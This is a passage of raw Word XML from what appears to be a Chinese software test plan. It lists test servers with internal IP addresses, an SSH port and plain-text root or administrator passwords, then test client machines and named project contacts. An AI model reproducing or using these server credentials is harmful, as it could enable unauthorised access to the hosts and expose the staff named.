          <w:p w14:paraId="07BC5CB5"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hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>操作系统</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="603D4A78"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hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>I</w:t>
            </w:r>
            <w:r w:rsidRPr="00536672">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>P</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A5EB8B5"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R</w:t>
            </w:r>
            <w:r w:rsidRPr="00536672">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>oot或administrator密码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="00290230" w14:paraId="3128E4B6" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="642"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1740" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="611D8E2A"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服务器1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1846" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45E3DC37"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R</w:t>
            </w:r>
            <w:r w:rsidRPr="00536672">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>edhat</w:t>
            </w:r>
            <w:r w:rsidRPr="00536672">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> 7.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51840697"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hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>10.200.167.137</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50FDBC2D"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r</w:t>
            </w:r>
            <w:r w:rsidRPr="00536672">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>oot</w:t>
            </w:r>
            <w:r w:rsidRPr="00536672">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>/Sysb37L</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="00290230" w14:paraId="2B3649CA" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="627"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1740" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08DAF635"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lastRenderedPageBreak/>
              <w:t>服务器2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1846" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53240BCC"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R</w:t>
            </w:r>
            <w:r w:rsidRPr="00536672">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>edhat</w:t>
            </w:r>
            <w:r w:rsidRPr="00536672">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> 7.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28E561F5"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hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>10.200.167.138</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02EBCD79"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r</w:t>
            </w:r>
            <w:r w:rsidRPr="00536672">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>oot</w:t>
            </w:r>
            <w:r w:rsidRPr="00536672">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>/Sysb38L</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="00290230" w14:paraId="5B619DCA" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="627"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1740" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CB99204"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服务器3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1846" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="562386CF"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S</w:t>
            </w:r>
            <w:r w:rsidRPr="00536672">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>use</w:t>
            </w:r>
            <w:r w:rsidRPr="00536672">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> 12</w:t>
            </w:r>
            <w:r w:rsidRPr="00536672">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>sp3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BF7877F"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hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>10.200.92.214</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5215D3E0"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w:t>
            </w:r>
            <w:r w:rsidRPr="00536672">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>端口号是16022</w:t>
            </w:r>
            <w:r w:rsidRPr="00536672">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A6E0FD1"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Sysb@14L</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="00290230" w14:paraId="275A7AAD" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="627"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1740" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AEF388E"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服务器4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1846" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5659882F"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S</w:t>
            </w:r>
            <w:r w:rsidRPr="00536672">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>use</w:t>
            </w:r>
            <w:r w:rsidRPr="00536672">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> 12</w:t>
            </w:r>
            <w:r w:rsidRPr="00536672">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>sp3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43CA62CB"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hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>10.200.171.215</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="463CD8EB"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abcde@123</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="00290230" w14:paraId="642BAFF6" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="627"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1740" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55210761"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服务器5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1846" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F24E77B"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S</w:t>
            </w:r>
            <w:r w:rsidRPr="00536672">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>use</w:t>
            </w:r>
            <w:r w:rsidRPr="00536672">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> 12</w:t>
            </w:r>
            <w:r w:rsidRPr="00536672">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>sp3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75D15251"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hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>10.200.171.194</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A4FD858" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="1f4"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00536672">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>abcde@123</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7B0A6447" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="193" w:name="_Toc36487898"/>
      <w:r w:rsidRPr="00536672">
        <w:t>测试机</w:t>
      </w:r>
      <w:bookmarkEnd w:id="193"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af0"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1337"/>
        <w:gridCol w:w="2119"/>
        <w:gridCol w:w="2485"/>
        <w:gridCol w:w="2361"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="00536672" w14:paraId="2B0327EB" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58B5F7EB"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操作系统</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57F4E396"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浏览器</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68CBDCF0"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其它工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2361" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FE7CF28"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备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="00536672" w14:paraId="054AD350" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="441"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="331F3BE9"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Windows10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="504A35CE"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Chrome、Firefox、IE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49FF09B6"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Xshell/CRT/ssh secure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2361" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="582457D8"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Pc 1台</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="00536672" w14:paraId="65819924" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="441"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22994F60"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Windows8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E86C8E6"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Chrome、Firefox、IE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43D61425"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Xshell/CRT/ssh secure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2361" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06CF9B33"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Pc 1台</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="00536672" w14:paraId="7ECFF363" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37DCDAF6"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Mac os</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EC8E3E3"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Chrome 、Safari</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BDB511B"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系统终端、zentermlite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2361" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57C36A40"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mac笔记本1台</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="00536672" w14:paraId="333E5112" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AB90A83"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Windows10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77D50CA4"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Chrome、Firefox、IE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4352F39A"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Xshell/CRT/ssh secure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2361" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="605836E1" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00536672">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Thinkpad笔记本2台</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="78B8F8A0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="194" w:name="_Toc227386338"/>
      <w:bookmarkStart w:id="195" w:name="_Toc222309956"/>
      <w:bookmarkStart w:id="196" w:name="_Toc227386481"/>
      <w:bookmarkStart w:id="197" w:name="_Toc36487899"/>
      <w:bookmarkStart w:id="198" w:name="_Toc36573220"/>
      <w:bookmarkStart w:id="199" w:name="_Toc36630297"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所需的合作方配合</w:t>
      </w:r>
      <w:bookmarkEnd w:id="194"/>
      <w:bookmarkEnd w:id="195"/>
      <w:bookmarkEnd w:id="196"/>
      <w:bookmarkEnd w:id="197"/>
      <w:bookmarkEnd w:id="198"/>
      <w:bookmarkEnd w:id="199"/>
    </w:p>
    <w:p w14:paraId="6B271133" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>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077"/>
        <w:gridCol w:w="1512"/>
        <w:gridCol w:w="1714"/>
        <w:gridCol w:w="836"/>
        <w:gridCol w:w="1127"/>
        <w:gridCol w:w="1098"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="61EB7470" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="955" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
          </w:tcPr>
          <w:p w14:paraId="54CBD420"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配合方</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1138" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
          </w:tcPr>
          <w:p w14:paraId="2A95C08B"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配合人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
          </w:tcPr>
          <w:p w14:paraId="4E086412"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希望提供的资源</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1778" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
          </w:tcPr>
          <w:p w14:paraId="32F3DCA2"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希望的配合工作</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="860" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
          </w:tcPr>
          <w:p w14:paraId="50640160"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配合阶段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1193" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
          </w:tcPr>
          <w:p w14:paraId="2795A781"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配合时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1162" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
          </w:tcPr>
          <w:p w14:paraId="3347BB5C"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备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="0365A22E" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="955" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20DED97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PM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1138" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="204A39FF"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邓志宏</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A9FBE35"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人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1778" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D50D78A"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资源协调和推动</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61698C44"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交叉自由测试安排</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="860" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29370351"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全程</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1193" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E870282" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1162" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C780506"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19969F93" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="955" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D0B80DF"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RD/FE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1138" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D5BD3C2"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李飞</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76D7B747"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利于测试的程序、页面及其部署安装文档</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1778" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C9F1E18"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分阶段提供被测程序</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F526FF0"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在开发周期的后20%前提供页面</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="860" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="689D0F45"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测试设计和测试执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1193" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C5FB609" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
